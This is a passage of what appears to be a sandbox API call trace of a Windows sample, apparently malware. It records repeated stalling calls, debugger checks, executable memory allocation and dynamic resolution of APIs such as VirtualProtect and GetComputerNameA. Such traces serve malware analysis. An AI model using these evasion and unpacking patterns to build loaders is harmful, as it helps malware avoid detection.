0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.252] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.253] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] GetLastError () returned 0x0 [0050.254] MsiViewFetch (hView=0xb, phRecord=0x0) returned 0x57 [0050.254] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76890000 [0050.256] GetProcAddress (hModule=0x76890000, lpProcName="GetMessagePos") returned 0x768c6703 [0050.256] GetMessagePos () returned 0x0 [0050.256] JetBeginExternalBackup () returned 0xfffffc15 [0050.256] GetWindowsDirectoryA (in: lpBuffer=0x12fe48, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0050.256] lstrcatA (in: lpString1="C:\\Windows", lpString2="\\system32\\taskmgr.exe" | out: lpString1="C:\\Windows\\system32\\taskmgr.exe") returned="C:\\Windows\\system32\\taskmgr.exe" [0050.256] GetBinaryTypeA (in: lpApplicationName="C:\\Windows\\system32\\taskmgr.exe", lpBinaryType=0x12fe38 | out: lpBinaryType=0x12fe38) returned 1 [0050.256] GetProcAddress (hModule=0x76890000, lpProcName="GetCaretBlinkTime") returned 0x768a0d01 [0050.256] GetCaretBlinkTime () returned 0x212 [0050.257] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x12fbc4 | out: ProcedureAddress=0x12fbc4*=0x765e2fb6) returned 0x0 [0050.257] VirtualAlloc (lpAddress=0x0, dwSize=0x12000, flAllocationType=0x1000, flProtect=0x4) returned 0x380000 [0050.259] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x12fbe4 | out: ProcedureAddress=0x12fbe4*=0x765e2fb6) returned 0x0 [0050.259] VirtualAlloc (lpAddress=0x0, dwSize=0xd000, flAllocationType=0x1000, flProtect=0x40) returned 0x3a0000 [0050.260] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="LoadLibraryA", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x765e395c) returned 0x0 [0050.260] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="GetProcAddress", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x765e33d3) returned 0x0 [0050.260] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x765e2fb6) returned 0x0 [0050.260] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualProtect", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x765d2341) returned 0x0 [0050.260] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="UnmapViewOfFile", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x765ddb13) returned 0x0 [0050.260] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="AddVectoredExceptionHandler", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x772af774) returned 0x0 [0050.260] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="RemoveVectoredExceptionHandler", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x7731ad2e) returned 0x0 [0050.260] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x764f0000 [0050.261] GetProcAddress (hModule=0x764f0000, lpProcName="GetUserNameA") returned 0x7651a4b4 [0050.261] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76590000 [0050.261] GetProcAddress (hModule=0x76590000, lpProcName="CreateFileA") returned 0x765dcee8 [0050.261] GetProcAddress (hModule=0x76590000, lpProcName="CloseHandle") returned 0x765dca7c [0050.261] GetProcAddress (hModule=0x76590000, lpProcName="GetModuleHandleA") returned 0x765dcf41 [0050.261] GetProcAddress (hModule=0x76590000, lpProcName="GetModuleFileNameA") returned 0x765e33f6 [0050.261] GetProcAddress (hModule=0x76590000, lpProcName="GetComputerNameA") returned 0x765c6ba9 [0050.261] GetProcAddress (hModule=0x76590000, lpProcName="GetComputerNameExA") returned 0x7661f41f [0050.261] GetProcAddress (hModule=0x76590000, lpProcName="lstrcmpA") returned 0x765c8c59 [0050.261] GetProcAddress (hModule=0x76590000, lpProcName="FreeConsole") returned 0x7663bfde [0050.261] GetProcAddress (hModule=0x76590000, lpProcName="VirtualAlloc") returned 0x765e2fb6 [0050.261] GetProcAddress (hModule=0x76590000, lpProcName="IsDebuggerPresent") returned 0x765d3ea8 [0050.261] GetProcAddress (hModule=0x76590000, lpProcName="GetCommandLineA") returned 0x765e98ff [0050.261] GetProcAddress (hModule=0x76590000, lpProcName="LoadLibraryA") returned 0x765e395c [0050.261] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x772a0000 [0050.261] GetProcAddress (hModule=0x772a0000, lpProcName="cos") returned 0x772e7400 [0050.261] GetProcAddress (hModule=0x772a0000, lpProcName="sin") returned 0x772d41c0 [0050.262] GetProcAddress (hModule=0x772a0000, lpProcName="strchr") returned 0x772e7690 [0050.262] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76b40000 [0050.262] GetProcAddress (hModule=0x76b40000, lpProcName="StrStrIA") returned 0x76b4d250 [0050.262] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.262] IsDebuggerPresent () returned 0 [0050.262] IsDebuggerPresent () returned 0 [0050.262] IsDebuggerPresent () returned 0 [0050.262] IsDebuggerPresent () returned 0 [0050.262] IsDebuggerPresent () returned 0 [0050.262] IsDebuggerPresent () returned 0 [0050.262] IsDebuggerPresent () returned 0 [0050.262] IsDebuggerPresent () returned 0 [0050.262] IsDebuggerPresent () returned 0 [0050.262] IsDebuggerPresent () returned 0 [0050.262] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.262] IsDebuggerPresent () returned 0 [0050.262] IsDebuggerPresent () returned 0 [0050.262] IsDebuggerPresent () returned 0 [0050.262] IsDebuggerPresent () returned 0 [0050.262] IsDebuggerPresent () returned 0 [0050.263] IsDebuggerPresent () returned 0 [0050.263] IsDebuggerPresent () returned 0 [0050.263] IsDebuggerPresent () returned 0 [0050.263] IsDebuggerPresent () returned 0 [0050.263] IsDebuggerPresent () returned 0 [0050.263] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.263] IsDebuggerPresent () returned 0 [0050.263] IsDebuggerPresent () returned 0 [0050.263] IsDebuggerPresent () returned 0 [0050.263] IsDebuggerPresent () returned 0 [0050.263] IsDebuggerPresent () returned 0 [0050.263] IsDebuggerPresent () returned 0 [0050.263] IsDebuggerPresent () returned 0 [0050.263] IsDebuggerPresent () returned 0 [0050.263] IsDebuggerPresent () returned 0 [0050.263] IsDebuggerPresent () returned 0 [0050.263] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.263] IsDebuggerPresent () returned 0 [0050.263] IsDebuggerPresent () returned 0 [0050.263] IsDebuggerPresent () returned 0 [0050.263] IsDebuggerPresent () returned 0 [0050.263] IsDebuggerPresent () returned 0 [0050.264] IsDebuggerPresent () returned 0 [0050.264] IsDebuggerPresent () returned 0 [0050.264] IsDebuggerPresent () returned 0 [0050.264] IsDebuggerPresent () returned 0 [0050.264] IsDebuggerPresent () returned 0 [0050.264] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.264] IsDebuggerPresent () returned 0 [0050.264] IsDebuggerPresent () returned 0 [0050.264] IsDebuggerPresent () returned 0 [0050.264] IsDebuggerPresent () returned 0 [0050.264] IsDebuggerPresent () returned 0 [0050.264] IsDebuggerPresent () returned 0 [0050.264] IsDebuggerPresent () returned 0 [0050.264] IsDebuggerPresent () returned 0 [0050.264] IsDebuggerPresent () returned 0 [0050.264] IsDebuggerPresent () returned 0 [0050.264] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.264] IsDebuggerPresent () returned 0 [0050.264] IsDebuggerPresent () returned 0 [0050.264] IsDebuggerPresent () returned 0 [0050.264] IsDebuggerPresent () returned 0 [0050.264] IsDebuggerPresent () returned 0 [0050.265] IsDebuggerPresent () returned 0 [0050.265] IsDebuggerPresent () returned 0 [0050.265] IsDebuggerPresent () returned 0 [0050.265] IsDebuggerPresent () returned 0 [0050.265] IsDebuggerPresent () returned 0 [0050.265] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.265] IsDebuggerPresent () returned 0 [0050.265] IsDebuggerPresent () returned 0 [0050.265] IsDebuggerPresent () returned 0 [0050.265] IsDebuggerPresent () returned 0 [0050.265] IsDebuggerPresent () returned 0 [0050.265] IsDebuggerPresent () returned 0 [0050.265] IsDebuggerPresent () returned 0 [0050.265] IsDebuggerPresent () returned 0 [0050.265] IsDebuggerPresent () returned 0 [0050.265] IsDebuggerPresent () returned 0 [0050.265] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.265] IsDebuggerPresent () returned 0 [0050.265] IsDebuggerPresent () returned 0 [0050.265] IsDebuggerPresent () returned 0 [0050.265] IsDebuggerPresent () returned 0 [0050.265] IsDebuggerPresent () returned 0 [0050.265] IsDebuggerPresent () returned 0 [0050.265] IsDebuggerPresent () returned 0 [0050.265] IsDebuggerPresent () returned 0 [0050.266] IsDebuggerPresent () returned 0 [0050.266] IsDebuggerPresent () returned 0 [0050.266] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.266] IsDebuggerPresent () returned 0 [0050.266] IsDebuggerPresent () returned 0 [0050.266] IsDebuggerPresent () returned 0 [0050.266] IsDebuggerPresent () returned 0 [0050.266] IsDebuggerPresent () returned 0 [0050.266] IsDebuggerPresent () returned 0 [0050.266] IsDebuggerPresent () returned 0 [0050.266] IsDebuggerPresent () returned 0 [0050.266] IsDebuggerPresent () returned 0 [0050.266] IsDebuggerPresent () returned 0 [0050.266] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.266] IsDebuggerPresent () returned 0 [0050.266] IsDebuggerPresent () returned 0 [0050.266] IsDebuggerPresent () returned 0 [0050.266] IsDebuggerPresent () returned 0 [0050.266] IsDebuggerPresent () returned 0 [0050.266] IsDebuggerPresent () returned 0 [0050.266] IsDebuggerPresent () returned 0 [0050.266] IsDebuggerPresent () returned 0 [0050.266] IsDebuggerPresent () returned 0 [0050.266] IsDebuggerPresent () returned 0 [0050.267] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.267] IsDebuggerPresent () returned 0 [0050.267] IsDebuggerPresent () returned 0 [0050.267] IsDebuggerPresent () returned 0 [0050.267] IsDebuggerPresent () returned 0 [0050.267] IsDebuggerPresent () returned 0 [0050.267] IsDebuggerPresent () returned 0 [0050.267] IsDebuggerPresent () returned 0 [0050.267] IsDebuggerPresent () returned 0 [0050.267] IsDebuggerPresent () returned 0 [0050.267] IsDebuggerPresent () returned 0 [0050.267] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.267] IsDebuggerPresent () returned 0 [0050.267] IsDebuggerPresent () returned 0 [0050.267] IsDebuggerPresent () returned 0 [0050.267] IsDebuggerPresent () returned 0 [0050.267] IsDebuggerPresent () returned 0 [0050.267] IsDebuggerPresent () returned 0 [0050.267] IsDebuggerPresent () returned 0 [0050.267] IsDebuggerPresent () returned 0 [0050.267] IsDebuggerPresent () returned 0 [0050.267] IsDebuggerPresent () returned 0 [0050.267] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.267] IsDebuggerPresent () returned 0 [0050.267] IsDebuggerPresent () returned 0 [0050.268] IsDebuggerPresent () returned 0 [0050.268] IsDebuggerPresent () returned 0 [0050.268] IsDebuggerPresent () returned 0 [0050.268] IsDebuggerPresent () returned 0 [0050.268] IsDebuggerPresent () returned 0 [0050.268] IsDebuggerPresent () returned 0 [0050.268] IsDebuggerPresent () returned 0 [0050.268] IsDebuggerPresent () returned 0 [0050.268] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.268] IsDebuggerPresent () returned 0 [0050.268] IsDebuggerPresent () returned 0 [0050.268] IsDebuggerPresent () returned 0 [0050.268] IsDebuggerPresent () returned 0 [0050.268] IsDebuggerPresent () returned 0 [0050.268] IsDebuggerPresent () returned 0 [0050.268] IsDebuggerPresent () returned 0 [0050.268] IsDebuggerPresent () returned 0 [0050.268] IsDebuggerPresent () returned 0 [0050.268] IsDebuggerPresent () returned 0 [0050.268] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.268] IsDebuggerPresent () returned 0 [0050.268] IsDebuggerPresent () returned 0 [0050.268] IsDebuggerPresent () returned 0 [0050.268] IsDebuggerPresent () returned 0 [0050.269] IsDebuggerPresent () returned 0 [0050.269] IsDebuggerPresent () returned 0 [0050.269] IsDebuggerPresent () returned 0 [0050.269] IsDebuggerPresent () returned 0 [0050.269] IsDebuggerPresent () returned 0 [0050.269] IsDebuggerPresent () returned 0 [0050.269] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.269] IsDebuggerPresent () returned 0 [0050.269] IsDebuggerPresent () returned 0 [0050.269] IsDebuggerPresent () returned 0 [0050.269] IsDebuggerPresent () returned 0 [0050.269] IsDebuggerPresent () returned 0 [0050.269] IsDebuggerPresent () returned 0 [0050.269] IsDebuggerPresent () returned 0 [0050.269] IsDebuggerPresent () returned 0 [0050.269] IsDebuggerPresent () returned 0 [0050.269] IsDebuggerPresent () returned 0 [0050.269] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.269] IsDebuggerPresent () returned 0 [0050.269] IsDebuggerPresent () returned 0 [0050.269] IsDebuggerPresent () returned 0 [0050.269] IsDebuggerPresent () returned 0 [0050.269] IsDebuggerPresent () returned 0 [0050.269] IsDebuggerPresent () returned 0 [0050.269] IsDebuggerPresent () returned 0 [0050.270] IsDebuggerPresent () returned 0 [0050.270] IsDebuggerPresent () returned 0 [0050.270] IsDebuggerPresent () returned 0 [0050.270] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.270] IsDebuggerPresent () returned 0 [0050.270] IsDebuggerPresent () returned 0 [0050.270] IsDebuggerPresent () returned 0 [0050.270] IsDebuggerPresent () returned 0 [0050.270] IsDebuggerPresent () returned 0 [0050.270] IsDebuggerPresent () returned 0 [0050.270] IsDebuggerPresent () returned 0 [0050.270] IsDebuggerPresent () returned 0 [0050.270] IsDebuggerPresent () returned 0 [0050.270] IsDebuggerPresent () returned 0 [0050.270] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.270] IsDebuggerPresent () returned 0 [0050.270] IsDebuggerPresent () returned 0 [0050.270] IsDebuggerPresent () returned 0 [0050.270] IsDebuggerPresent () returned 0 [0050.270] IsDebuggerPresent () returned 0 [0050.270] IsDebuggerPresent () returned 0 [0050.270] IsDebuggerPresent () returned 0 [0050.270] IsDebuggerPresent () returned 0 [0050.270] IsDebuggerPresent () returned 0 [0050.271] IsDebuggerPresent () returned 0 [0050.271] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.271] IsDebuggerPresent () returned 0 [0050.271] IsDebuggerPresent () returned 0 [0050.271] IsDebuggerPresent () returned 0 [0050.271] IsDebuggerPresent () returned 0 [0050.271] IsDebuggerPresent () returned 0 [0050.271] IsDebuggerPresent () returned 0 [0050.271] IsDebuggerPresent () returned 0 [0050.271] IsDebuggerPresent () returned 0 [0050.271] IsDebuggerPresent () returned 0 [0050.271] IsDebuggerPresent () returned 0 [0050.271] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.271] IsDebuggerPresent () returned 0 [0050.271] IsDebuggerPresent () returned 0 [0050.271] IsDebuggerPresent () returned 0 [0050.271] IsDebuggerPresent () returned 0 [0050.271] IsDebuggerPresent () returned 0 [0050.271] IsDebuggerPresent () returned 0 [0050.271] IsDebuggerPresent () returned 0 [0050.271] IsDebuggerPresent () returned 0 [0050.271] IsDebuggerPresent () returned 0 [0050.271] IsDebuggerPresent () returned 0 [0050.271] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.272] IsDebuggerPresent () returned 0 [0050.272] IsDebuggerPresent () returned 0 [0050.272] IsDebuggerPresent () returned 0 [0050.272] IsDebuggerPresent () returned 0 [0050.272] IsDebuggerPresent () returned 0 [0050.272] IsDebuggerPresent () returned 0 [0050.272] IsDebuggerPresent () returned 0 [0050.272] IsDebuggerPresent () returned 0 [0050.272] IsDebuggerPresent () returned 0 [0050.272] IsDebuggerPresent () returned 0 [0050.272] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.272] IsDebuggerPresent () returned 0 [0050.272] IsDebuggerPresent () returned 0 [0050.272] IsDebuggerPresent () returned 0 [0050.272] IsDebuggerPresent () returned 0 [0050.272] IsDebuggerPresent () returned 0 [0050.272] IsDebuggerPresent () returned 0 [0050.272] IsDebuggerPresent () returned 0 [0050.272] IsDebuggerPresent () returned 0 [0050.272] IsDebuggerPresent () returned 0 [0050.272] IsDebuggerPresent () returned 0 [0050.272] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.272] IsDebuggerPresent () returned 0 [0050.272] IsDebuggerPresent () returned 0 [0050.273] IsDebuggerPresent () returned 0 [0050.273] IsDebuggerPresent () returned 0 [0050.273] IsDebuggerPresent () returned 0 [0050.273] IsDebuggerPresent () returned 0 [0050.273] IsDebuggerPresent () returned 0 [0050.273] IsDebuggerPresent () returned 0 [0050.273] IsDebuggerPresent () returned 0 [0050.273] IsDebuggerPresent () returned 0 [0050.273] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.273] IsDebuggerPresent () returned 0 [0050.273] IsDebuggerPresent () returned 0 [0050.273] IsDebuggerPresent () returned 0 [0050.273] IsDebuggerPresent () returned 0 [0050.273] IsDebuggerPresent () returned 0 [0050.273] IsDebuggerPresent () returned 0 [0050.273] IsDebuggerPresent () returned 0 [0050.273] IsDebuggerPresent () returned 0 [0050.273] IsDebuggerPresent () returned 0 [0050.273] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.273] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.273] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.273] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.273] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.274] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.274] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.274] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.274] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.274] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.274] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.274] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.274] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.274] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.274] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.274] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.274] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.274] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.274] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.274] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.274] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.274] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.274] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.274] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.274] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.274] VirtualAlloc (lpAddress=0x0, 